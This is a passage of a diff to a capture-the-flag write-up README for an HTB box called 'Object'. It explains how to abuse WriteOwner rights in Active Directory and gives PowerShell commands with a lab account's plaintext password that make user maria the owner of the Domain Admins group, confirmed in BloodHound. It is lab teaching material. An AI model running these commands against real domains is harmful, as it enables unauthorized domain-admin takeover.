morph3/writeups/htb-unictf-quals-2021/fullpwn/object/README.md

 #### Abusing WriteOwner

+We can change the ownership of "Domain Admins" group like below,
 ```
 $SecPassword = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $SecPassword)

 Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity maria
 ```

-Now the owner of the "Domain Admins" object is maria but we still can't add our users to "Domain Admins" group, we also need to give permission to that.
+Now the owner of the "Domain Admins" object is maria but we still can't add our users to "Domain Admins" group.
+We also need to give permission to that.

-We can check it ussing bloodhound and as you can see that we now own the "Domain Admins".
+We can check it using bloodhound as well and as you can see that we now own the "Domain Admins".
 ![](https://i.imgur.com/tYqrH2C.png)

 Let's give all rights to maria